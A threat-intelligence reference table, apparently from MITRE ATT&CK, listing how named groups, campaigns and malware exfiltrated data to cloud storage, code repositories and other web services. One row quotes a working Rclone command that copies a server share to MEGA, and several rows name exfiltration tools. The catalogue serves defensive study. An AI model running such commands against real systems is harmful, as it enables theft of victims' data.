Real-world descriptions of how a group, tool or campaign used a technique.
17136 examples
| Technique | Used by | Procedure example |
|---|---|---|
| T1567 Exfiltration Over Web Service |
MalwareDropBook | DropBook has used legitimate web services to exfiltrate data. |
| T1567 Exfiltration Over Web Service |
MalwareExbyte | Exbyte exfiltrates collected data to online file hosting sites such as `Mega.co.nz`. |
| T1567 Exfiltration Over Web Service |
MalwareOilCheck | OilCheck can upload documents from compromised hosts to a shared Microsoft Office 365 Outlook email account for exfiltration. |
| T1567 Exfiltration Over Web Service |
MalwareSampleCheck5000 | SampleCheck5000 can use the Microsoft Office Exchange Web Services API to access an actor-controlled account and retrieve files for exfiltration. |
| T1567 Exfiltration Over Web Service |
Toolngrok | ngrok has been used by threat actors to configure servers for data exfiltration. |
| T1567 Exfiltration Over Web Service |
GroupShinyHunters | ShinyHunters has used compromised Salesforce CRM (Customer Relationship Management) dashboards to exfiltrate bulk data. Additionally, ShinyHunters has used LimeWire, a file-sharing service, to showcase samples of stolen data. |
| T1567.001 Exfiltration to Code Repository |
MalwareShai-Hulud | Shai-Hulud has created a repository named `Shai-Hulud` under the compromised account that commits a JSON dump that contains system information, environment variables and collected secrets. Shai-Hulud has also posted stolen credentials to public GitHub repositories. |
| T1567.001 Exfiltration to Code Repository |
ToolEmpire | Empire can use GitHub for data exfiltration. |
| T1567.001 Exfiltration to Code Repository |
MalwareTeamPCP Cloud Stealer | TeamPCP Cloud Stealer can create a repository in the victim's GitHub account using the victim's own GITHUB_TOKEN to upload stolen credentials. |
| T1567.001 Exfiltration to Code Repository |
MalwareMini Shai-Hulud | Mini Shai-Hulud has exfiltrated data through the use of the victim’s own GitHub repository by creating a new public repository using a unique naming convention from a curated list of key words or themes. |
| T1567.002 Exfiltration to Cloud Storage |
CampaignOperation Dream Job | During Operation Dream Job, Lazarus Group used a custom build of open-source command-line dbxcli to exfiltrate stolen data to Dropbox. |
| T1567.002 Exfiltration to Cloud Storage |
CampaignC0015 | During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command `rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`. |
| T1567.002 Exfiltration to Cloud Storage |
CampaignAPT41 DUST | APT41 DUST exfiltrated collected information to OneDrive. |
| T1567.002 Exfiltration to Cloud Storage |
GroupIndrik Spider | Indrik Spider has exfiltrated data using Rclone or MEGASync prior to deploying ransomware. |
| T1567.002 Exfiltration to Cloud Storage |
GroupKimsuky | Kimsuky has exfiltrated stolen files and data to actor-controlled Blogspot accounts. Kimsuky has also leveraged Dropbox for uploading victim system information. |
| T1567.002 Exfiltration to Cloud Storage |
GroupHAFNIUM | HAFNIUM has exfiltrated data to file sharing sites, including MEGA. |
| T1567.002 Exfiltration to Cloud Storage |
GroupMuddyWater | MuddyWater has attempted to exfiltrate data to Wasabi, a cloud storage service, using Rclone. |
| T1567.002 Exfiltration to Cloud Storage |
GroupFIN7 | FIN7 has exfiltrated stolen data to the MEGA file sharing site. |
| T1567.002 Exfiltration to Cloud Storage |
GroupMustang Panda | Mustang Panda has also exfiltrated archived files to cloud services such as Dropbox using `curl`. |
| T1567.002 Exfiltration to Cloud Storage |
GroupZIRCONIUM | ZIRCONIUM has exfiltrated stolen data to Dropbox. |
| T1567.002 Exfiltration to Cloud Storage |
GroupScattered Spider | Scattered Spider has exfiltrated victim data to the MEGA file sharing site, SnowFlake, and AWS S3 buckets. |
| T1567.002 Exfiltration to Cloud Storage |
GroupContagious Interview | Contagious Interview has exfiltrated stolen passwords to Dropbox. |
| T1567.002 Exfiltration to Cloud Storage |
GroupAkira | Akira will exfiltrate victim data using applications such as Rclone. |
| T1567.002 Exfiltration to Cloud Storage |
GroupPOLONIUM | POLONIUM has exfiltrated stolen data to POLONIUM-owned OneDrive and Dropbox accounts. |
| T1567.002 Exfiltration to Cloud Storage |
GroupConfucius | Confucius has exfiltrated victim data to cloud storage service accounts. |
| T1567.002 Exfiltration to Cloud Storage |
GroupLeviathan | Leviathan has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox. |
| T1567.002 Exfiltration to Cloud Storage |
GroupTurla | Turla has used WebDAV to upload stolen USB files to a cloud drive. Turla has also exfiltrated stolen files to OneDrive and 4shared. |
| T1567.002 Exfiltration to Cloud Storage |
GroupStorm-0501 | Storm-0501 has exfiltrated stolen data to the MEGA file sharing site. Storm-0501 has also utilized Rclone to exfiltrate data from victim environments to cloud storage such as MegaSync. Storm-0501 has exfiltrated data to their own infrastructure utilizing AzCopy Command-Line tool (CLI). |
| T1567.002 Exfiltration to Cloud Storage |
GroupCinnamon Tempest | Cinnamon Tempest has uploaded captured keystroke logs to the Alibaba Cloud Object Storage Service, Aliyun OSS. |
| T1567.002 Exfiltration to Cloud Storage |
GroupChimera | Chimera has exfiltrated stolen data to OneDrive accounts. |
| T1567.002 Exfiltration to Cloud Storage |
GroupMedusa Group | Medusa Group has utilized Rclone to exfiltrate data from victim environments to cloud storage. |
| T1567.002 Exfiltration to Cloud Storage |
GroupEmber Bear | Ember Bear has used tools such as Rclone to exfiltrate information from victim environments to cloud storage such as `mega.nz`. |
| T1567.002 Exfiltration to Cloud Storage |
GroupToddyCat | ToddyCat has used a DropBox uploader to exfiltrate stolen files. |
| T1567.002 Exfiltration to Cloud Storage |
GroupLuminousMoth | LuminousMoth has exfiltrated data to Google Drive. |
| T1567.002 Exfiltration to Cloud Storage |
GroupEarth Lusca | Earth Lusca has used the megacmd tool to upload stolen files from a victim network to MEGA. |
| T1567.002 Exfiltration to Cloud Storage |
GroupWizard Spider | Wizard Spider has exfiltrated stolen victim data to various cloud storage providers. |
| T1567.002 Exfiltration to Cloud Storage |
GroupHEXANE | HEXANE has used cloud services, including OneDrive, for data exfiltration. |
| T1567.002 Exfiltration to Cloud Storage |
GroupThreat Group-3390 | Threat Group-3390 has exfiltrated stolen data to Dropbox. |
| T1567.002 Exfiltration to Cloud Storage |
MalwareTsundere Botnet | Tsundere Botnet’s variant DinDoor has used Rclone to access a Wasabi server. |
| T1567.002 Exfiltration to Cloud Storage |
MalwareRainyDay | RainyDay can use a file exfiltration tool to upload specific files to Dropbox. |
| T1567.002 Exfiltration to Cloud Storage |
MalwareHAMMERTOSS | HAMMERTOSS exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later. |
| T1567.002 Exfiltration to Cloud Storage |
MalwareODAgent | ODAgent can use an attacker-controlled OneDrive account for exfiltration. |
| T1567.002 Exfiltration to Cloud Storage |
MalwareROKRAT | ROKRAT can send collected data to cloud storage services such as PCloud. |
| T1567.002 Exfiltration to Cloud Storage |
MalwareClambling | Clambling can send files from a victim's machine to Dropbox. |
| T1567.002 Exfiltration to Cloud Storage |
MalwareCreepyDrive | CreepyDrive can use cloud services including OneDrive for data exfiltration. |
| T1567.002 Exfiltration to Cloud Storage |
MalwareBoxCaon | BoxCaon has the capability to download folders' contents on the system and upload the results back to its Dropbox drive. |
| T1567.002 Exfiltration to Cloud Storage |
MalwareCrutch | Crutch has exfiltrated stolen data to Dropbox. |
| T1567.002 Exfiltration to Cloud Storage |
MalwareOilBooster | OilBooster can exfiltrate files to an actor-controlled OneDrive account via the Microsoft Graph API. |
| T1567.002 Exfiltration to Cloud Storage |
MalwareBoomBox | BoomBox can upload data to dedicated per-victim folders in Dropbox. |
| T1567.002 Exfiltration to Cloud Storage |
MalwareRIFLESPINE | RIFLESPINE can upload results from executed C2 commands to cloud storage. |
Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.